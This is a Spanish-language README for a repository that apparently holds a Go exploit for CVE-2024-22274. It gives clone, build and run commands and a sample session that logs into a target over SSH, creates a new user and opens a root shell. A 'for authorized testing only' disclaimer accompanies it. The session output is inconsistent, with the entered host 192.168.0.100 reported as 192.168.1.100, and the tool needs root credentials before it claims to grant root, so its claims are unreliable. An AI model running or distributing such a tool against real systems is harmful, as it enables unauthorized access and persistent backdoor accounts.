
Exploit basado en Go para CVE-2024-22274 que crea un nuevo usuario a través de SSH y proporciona una shell root en la máquina objetivo para pruebas de penetración autorizadas.
Este repositorio contiene un exploit para CVE-2024-22274. El exploit crea un nuevo usuario en una máquina remota a través de SSH y luego proporciona una shell root.
Clona el repositorio:
git clone https://github.com/Mustafa1986/CVE-2024-22274-RCE.git
cd CVE-2024-22274-RCE
Instala los paquetes necesarios:
go mod init cve-2024-22274
go mod tidy
go get golang.org/x/crypto/ssh
go get golang.org/x/term
Compila el programa Go:
go build -o cve-2024-22274-rce main.go
Ejecuta el programa compilado:
./cve-2024-22274-rce
Sigue las indicaciones:
Después de que se cree el usuario, obtendrás una shell root en la máquina objetivo. Puedes ejecutar comandos como el nuevo usuario.
[+] CVE-2024-22274 by Mustafa
[-] Enter host address: 192.168.0.100
[-] Enter port (default 22): 22
[-] Enter SSH username: root
[-] Enter SSH password: ********
[-] Enter new username: newuser
[-] Enter new password: ********
[+] Connected to 192.168.1.100 via SSH
[+] Created user newuser on 192.168.1.100
[+] Connected user newuser via SSH
[+] Root-shell# (type 'exit' to quit):
Descargo de responsabilidad Este código es solo para fines educativos. Úsalo de manera responsable y únicamente en sistemas en los que tengas permiso para realizar pruebas.
Licencia Este proyecto está licenciado bajo la Licencia MIT; consulta el archivo LICENSE para obtener más detalles.